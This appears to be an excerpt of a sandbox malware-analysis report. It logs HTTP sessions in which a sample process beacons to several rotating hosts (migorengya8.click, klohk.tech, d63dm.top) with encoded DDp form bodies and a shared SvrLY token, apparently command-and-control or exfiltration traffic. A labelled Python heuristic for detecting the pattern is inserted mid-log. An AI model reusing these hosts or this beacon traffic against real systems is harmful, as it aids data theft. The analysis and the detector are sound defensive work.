Nov 6, 2024 08:40:53.640574932 CET | 1033 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 796
date: Wed, 06 Nov 2024 07:40:53 GMT
server: LiteSpeed
                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.6 | 50001 | 198.252.98.54 | 80 | 4156 | C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe

Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 08:40:55.615777969 CET | 846 | OUT | POST /y3dc/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.migorengya8.click
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 232
Cache-Control: no-cache
Origin: http://www.migorengya8.click
Referer: http://www.migorengya8.click/y3dc/
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Data Raw: 44 44 70 3d 76 6a 6a 6d 61 58 57 74 79 6d 74 75 6a 54 55 7a 72 6b 56 7a 73 6c 51 63 75 61 69 76 35 45 4a 34 68 4b 42 36 30 32 46 35 33 52 69 4b 39 74 59 70 75 46 42 71 65 35 70 63 4b 48 75 6a 56 6d 72 67 4e 31 71 6a 69 44 41 6b 53 46 70 39 63 4e 72 42 2b 2f 42 50 66 44 6a 72 2b 65 35 67 30 78 6f 78 41 76 38 71 6e 44 33 6f 61 34 35 68 48 67 61 51 6b 50 35 4f 57 6f 39 2f 6b 45 49 52 44 72 30 6d 31 49 4f 6a 2f 49 43 6a 45 2f 47 63 4d 72 41 49 69 44 30 70 63 56 62 4b 4f 70 52 72 52 78 4b 30 4c 71 6d 4d 70 44 57 67 37 48 74 38 51 37 78 76 53 71 6e 6f 45 7a 47 74 37 41 51 4e 4e 75 59 6f 73 4e 34 73 39 78 68 72 44 43 46 50 2b 48 49 4a 37 4a 73 6f 4b 4b 4a 54 55 5a 56 32 71 4d 36 48 77 67 3d 3d
                                                                                                        Data Ascii: DDp=vjjmaXWtymtujTUzrkVzslQcuaiv5EJ4hKB602F53RiK9tYpuFBqe5pcKHujVmrgN1qjiDAkSFp9cNrB+/BPfDjr+e5g0xoxAv8qnD3oa45hHgaQkP5OWo9/kEIRDr0m1IOj/ICjE/GcMrAIiD0pcVbKOpRrRxK0LqmMpDWg7Ht8Q7xvSqnoEzGt7AQNNuYosN4s9xhrDCFP+HIJ7JsoKKJTUZV2qM6Hwg==
Nov 6, 2024 08:40:56.266798019 CET | 1033 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 796
date: Wed, 06 Nov 2024 07:40:56 GMT
server: LiteSpeed
                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
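
Added example, not code from the report, from Joe Sandbox or from the sample: a heuristic that parses raw HTTP requests in the form shown in sessions 12 to 18 and flags the pattern they exhibit, namely one PID (4156) contacting three unrelated hosts in turn, always with the same Android User-Agent string, a GET whose query carries the DDp parameter together with the same SvrLY=3P8lALA token, and POSTs whose body is a single DDp form field with the same Content-Length run (208, 232, 1244) on each host. The hosts, paths, parameter names and lengths are the ones the report records; the build_request helper, the filler parameter values, the feature choice and the thresholds are this example's own assumptions. Responses are deliberately not consulted: the www.migorengya8.click sessions above answer 404 and still belong to the pattern.

```python
"""
Heuristic detector for the rotating-host HTTP beacon pattern recorded in the
sessions above. Added example; not part of the Joe Sandbox report and not code
from the analysed sample.
"""
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

UA = ("Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 "
      "(KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36")


def build_request(method, host, path, body_len=None):
    """Constructed-sample helper: a raw HTTP/1.1 request in the shape seen in the
    report, with the opaque parameter value replaced by filler of the same length."""
    lines = [f"{method} {path} HTTP/1.1", f"Host: {host}",
             "Connection: close", f"User-Agent: {UA}"]
    body = ""
    if body_len is not None:
        body = "DDp=" + "A" * (body_len - 4)
        lines += ["Content-Type: application/x-www-form-urlencoded",
                  f"Content-Length: {body_len}",
                  f"Origin: http://{host}", f"Referer: http://{host}{path}"]
    return "\r\n".join(lines) + "\r\n\r\n" + body


# Constructed sample: the request side of sessions 12 to 18 for PID 4156, in
# order, keeping the hosts, paths, parameter names and Content-Length values
# the report shows (parameter values are filler).
SAMPLE = [
    (4156, build_request("GET", "www.schedulemassage.xyz",
                         "/slxp/?DDp=" + "Q" * 110 + "&SvrLY=3P8lALA")),
    (4156, build_request("POST", "www.mcfunding.org", "/0598/", 208)),
    (4156, build_request("POST", "www.mcfunding.org", "/0598/", 232)),
    (4156, build_request("POST", "www.mcfunding.org", "/0598/", 1244)),
    (4156, build_request("GET", "www.mcfunding.org",
                         "/0598/?SvrLY=3P8lALA&DDp=" + "t" * 110)),
    (4156, build_request("POST", "www.migorengya8.click", "/y3dc/", 208)),
    (4156, build_request("POST", "www.migorengya8.click", "/y3dc/", 232)),
]


def parse_request(raw):
    """Split a raw request into (method, path, headers with lower-cased names, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def profile(requests):
    """Per (pid, host): user agents seen, GET query keys, POST form keys and the
    ordered list of POST body lengths."""
    prof = defaultdict(lambda: {"ua": set(), "get_keys": set(),
                                "post_keys": set(), "post_lens": []})
    for pid, raw in requests:
        method, path, headers, body = parse_request(raw)
        p = prof[(pid, headers.get("host", ""))]
        p["ua"].add(headers.get("user-agent", ""))
        if method == "GET":
            p["get_keys"].update(k for k, _ in parse_qsl(urlsplit(path).query))
        elif method == "POST":
            p["post_keys"].update(k for k, _ in parse_qsl(body))
            p["post_lens"].append(len(body))
    return prof


def same_run(a, b):
    """True when one POST-length run is a prefix of the other, so a capture that
    was cut off mid-run still matches a complete run to another host."""
    n = min(len(a), len(b))
    return n > 0 and a[:n] == b[:n]


def detect_beacon(requests, min_hosts=2):
    """Flag a PID that rotates through several hosts with a single User-Agent, one
    form key shared by every POST and a POST body-length run repeated on at least
    two hosts. Feature choice and thresholds are this example's assumptions."""
    by_pid = defaultdict(dict)
    for (pid, host), p in profile(requests).items():
        by_pid[pid][host] = p
    findings = []
    for pid, hosts in by_pid.items():
        uas = set().union(*(p["ua"] for p in hosts.values()))
        posted = {h: p for h, p in hosts.items() if p["post_lens"]}
        shared_key = (set.intersection(*(p["post_keys"] for p in posted.values()))
                      if posted else set())
        runs = {h: p["post_lens"] for h, p in posted.items()}
        repeated = sorted(h for h, a in runs.items()
                          if any(o != h and same_run(a, b) for o, b in runs.items()))
        if len(hosts) >= min_hosts and len(uas) == 1 and shared_key and len(repeated) >= 2:
            findings.append({"pid": pid, "hosts": sorted(hosts),
                             "user_agent": next(iter(uas)),
                             "shared_post_key": sorted(shared_key),
                             "post_length_runs": runs,
                             "repeated_run_hosts": repeated})
    return findings


if __name__ == "__main__":
    for f in detect_beacon(SAMPLE):
        print(f"PID {f['pid']}: {len(f['hosts'])} hosts, shared POST key "
              f"{f['shared_post_key']}, POST length runs {f['post_length_runs']}")
```

In practice the input would be the sandbox's HTTP log or a proxy capture grouped by PID or source port, not hand-built requests. The User-Agent equality check is the weakest feature here, because a string is trivial for a sample to change; the repeated body-length run across unrelated hosts and the single shared form key are what separate this traffic from a browser visiting three sites.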


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.6 | 50002 | 198.252.98.54 | 80 | 4156 | C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe

Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 08:40:58.184679985 CET | 1859 | OUT | POST /y3dc/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.migorengya8.click
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 1244
Cache-Control: no-cache
Origin: http://www.migorengya8.click
Referer: http://www.migorengya8.click/y3dc/
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Data Ascii: DDp= [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.6 | 50003 | 198.252.98.54 | 80 | 4156 | C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe

Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 08:41:00.734349966 CET | 554 | OUT | GET /y3dc/?DDp=ihLGZn7rk3oJmiI0qHBJyF4us9aj83dk38RHqm5p8i+Dx9088FhrC90fflTIanmBNHjorQ8RX0lkasPQ9tREfAnxyZwa91URYeYbxhv5bPljMHSbrvZtVpRz6w5PNfkG2YKS2Ps=&SvrLY=3P8lALA HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Host: www.migorengya8.click
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Nov 6, 2024 08:41:01.380016088 CET | 1033 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 796
date: Wed, 06 Nov 2024 07:41:01 GMT
server: LiteSpeed
Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.6 | 50005 | 103.224.182.242 | 80 | 4156 | C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe

Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 08:41:06.764895916 CET | 801 | OUT | POST /3m3e/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.klohk.tech
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 208
Cache-Control: no-cache
Origin: http://www.klohk.tech
Referer: http://www.klohk.tech/3m3e/
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Data Ascii: DDp=NEUQnq9Sab7mzuQRE4SfuRyxbefXuw5m/nY7DcRY6x59VxSqXWEi+/xWO4NKNmjVyosyI447HN5aGQvNkHYvG+kzblprphMwuA68OTvt8ZAaw71RcG6X2+IQab0V2ktoTp3yrLxvizNvgSy0DsGZv4kQ9Bf6R95ymxkIaAaTsstVFoDDyOEBKuAXG+rvkDhvD4jIe2x6Bm0+
Nov 6, 2024 08:41:07.425868988 CET | 871 | IN | HTTP/1.1 200 OK
date: Wed, 06 Nov 2024 07:41:07 GMT
server: Apache
set-cookie: __tad=1730878867.8996817; expires=Sat, 04-Nov-2034 07:41:07 GMT; Max-Age=315360000
vary: Accept-Encoding
content-encoding: gzip
content-length: 576
content-type: text/html; charset=UTF-8
connection: close
Data Ascii: (gzip-compressed response body, 576 bytes; not printable)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.6 | 50006 | 103.224.182.242 | 80 | 4156 | C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe

Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 08:41:09.315457106 CET | 825 | OUT | POST /3m3e/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.klohk.tech
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 232
Cache-Control: no-cache
Origin: http://www.klohk.tech
Referer: http://www.klohk.tech/3m3e/
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Data Ascii: DDp=NEUQnq9Sab7mwNYRI/Gf5hy2eefX7g5i/nE7Dfd29EJ9VQiqUXEi9/xWGYMADGibyoxRI6c7HOFaGRfNk2YsX+kxXFpp0xMwuA68OSLT8ZoaxKFRcn6U/eIPdb0VyktkTp2VrKdJi1BvgXe0DeuW2Ikeixe9cck3oylFRh6g/8FqEeeZu9EiY+gVG8zdkjhFB4bIMh9dOSRd79ix0oFaGlVJEYrGTCk4MA==
Nov 6, 2024 08:41:09.973614931 CET | 871 | IN | HTTP/1.1 200 OK
date: Wed, 06 Nov 2024 07:41:09 GMT
server: Apache
set-cookie: __tad=1730878869.5521474; expires=Sat, 04-Nov-2034 07:41:09 GMT; Max-Age=315360000
vary: Accept-Encoding
content-encoding: gzip
content-length: 576
content-type: text/html; charset=UTF-8
connection: close
Data Ascii: (gzip-compressed response body, 576 bytes; not printable)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.6 | 50007 | 103.224.182.242 | 80 | 4156 | C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe

Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 08:41:11.865485907 CET | 1838 | OUT | POST /3m3e/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.klohk.tech
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 1244
Cache-Control: no-cache
Origin: http://www.klohk.tech
Referer: http://www.klohk.tech/3m3e/
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Data Ascii: DDp= [TRUNCATED]
Nov 6, 2024 08:41:12.519090891 CET | 871 | IN | HTTP/1.1 200 OK
date: Wed, 06 Nov 2024 07:41:12 GMT
server: Apache
set-cookie: __tad=1730878872.4430285; expires=Sat, 04-Nov-2034 07:41:12 GMT; Max-Age=315360000
vary: Accept-Encoding
content-encoding: gzip
content-length: 576
content-type: text/html; charset=UTF-8
connection: close
Data Ascii: (gzip-compressed response body, 576 bytes; not printable)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.6 | 50008 | 103.224.182.242 | 80 | 4156 | C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe

Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 08:41:14.405353069 CET | 547 | OUT | GET /3m3e/?SvrLY=3P8lALA&DDp=AG8wkc12D4O4qfE3dc2ZpUKPRZyp2gRu+0k6EtFb5UlufQ+lVXFR/9gePpQjCGKa/ZsQJ4MYKcJmAxrfjl4cD9BPWmhuph4utiW3Dhv00Os4z+1dRn6W+dMqbZ0s1lU/AMvHhe0= HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Host: www.klohk.tech
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Nov 6, 2024 08:41:15.086507082 CET | 1236 | IN | HTTP/1.1 200 OK
date: Wed, 06 Nov 2024 07:41:14 GMT
server: Apache
set-cookie: __tad=1730878874.4830390; expires=Sat, 04-Nov-2034 07:41:14 GMT; Max-Age=315360000
vary: Accept-Encoding
content-length: 1517
content-type: text/html; charset=UTF-8
connection: close
Data Ascii: <html><head><title>klohk.tech</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.klohk.tech/3m3e/?SvrLY=3P8lALA&DDp=AG8wkc12D4O4qfE3dc2ZpUKPRZyp2gRu+0k6EtFb5UlufQ+lVXFR/9gePpQjCGKa/ZsQJ4MYKcJmAxrfjl4cD9BPWmhuph4utiW3Dhv00Os4z+1dRn6W+dMqbZ0s1lU/AMvHhe0=&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><body bgcolor=
                                                                                                        Nov 6, 2024 08:41:15.086530924 CET | 553 | IN | Data Ascii: "#ffffff" text="#000000"><div style='display: none;'><a href='http://www.klohk.tech/3m3e/?SvrLY=3P8lALA&DDp=AG8wkc12D4O4qfE3dc2ZpUKPRZyp2gRu+0k6EtFb5UlufQ+lVXFR/9gePpQjCGKa/ZsQJ4MYKcJmAxrfjl4cD9BPWmhuph4utiW3Dhv00Os4z+1dRn6W+dMqbZ0s1lU/AMvHhe


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        25 | 192.168.2.6 | 50009 | 154.23.184.218 | 80 | 4156 | C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        Nov 6, 2024 08:41:20.776249886 CET | 798 | OUT | POST /rqnz/ HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.d63dm.top
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Content-Length: 208
                                                                                                        Cache-Control: no-cache
                                                                                                        Origin: http://www.d63dm.top
                                                                                                        Referer: http://www.d63dm.top/rqnz/
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Data Ascii: DDp=24JOOXJ8e4hNafosBk21d/QESDNCjyFLW837G7wH3/DDhzCZR1N8CXtg+gK+4Om7tsqe3bMhObI38Pvz7FaUja0/bfSGV9++WJBkhJo+o9Vxvze9rhpg6+vKOhaPbTysK5pZOst22B8iTEMhDHUzOSJLjYleRDImPt9djTJhG1q6zP9XwF7j76oeuHUDpBaJGAi9BHLNMO3O
                                                                                                        Nov 6, 2024 08:41:21.718147039 CET | 302 | IN | HTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Wed, 06 Nov 2024 07:41:21 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 138
                                                                                                        Connection: close
                                                                                                        ETag: "669137aa-8a"
                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        26 | 192.168.2.6 | 50010 | 154.23.184.218 | 80 | 4156 | C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        Nov 6, 2024 08:41:23.326683998 CET | 822 | OUT | POST /rqnz/ HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.d63dm.top
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Content-Length: 232
                                                                                                        Cache-Control: no-cache
                                                                                                        Origin: http://www.d63dm.top
                                                                                                        Referer: http://www.d63dm.top/rqnz/
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Data Ascii: DDp=24JOOXJ8e4hNb/YsOl21IPQHdjNCoSFPW8r7G6EX3snDhSyZQxZ8FXtgxAK31umKtsWW3aAhObs38Ofz4yGTiK05U/SEKt++WJBkhJsYo9txvmO9xEVj0evJexaPKDyoK5pnOthP2HgiTAIhDV8wFSJNs4lAXzhqAsYrgTMHdnagy5gNs27ApqIcuFMxphajEAa9TQHqD6StWs9hlAWQMkVIs4apXePqBw==
                                                                                                        Nov 6, 2024 08:41:24.278285027 CET | 302 | IN | HTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Wed, 06 Nov 2024 07:41:24 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 138
                                                                                                        Connection: close
                                                                                                        ETag: "669137aa-8a"
                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        27 | 192.168.2.6 | 50011 | 154.23.184.218 | 80 | 4156 | C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        Nov 6, 2024 08:41:25.877367020 CET | 1835 | OUT | POST /rqnz/ HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.d63dm.top
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Content-Length: 1244
                                                                                                        Cache-Control: no-cache
                                                                                                        Origin: http://www.d63dm.top
                                                                                                        Referer: http://www.d63dm.top/rqnz/
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
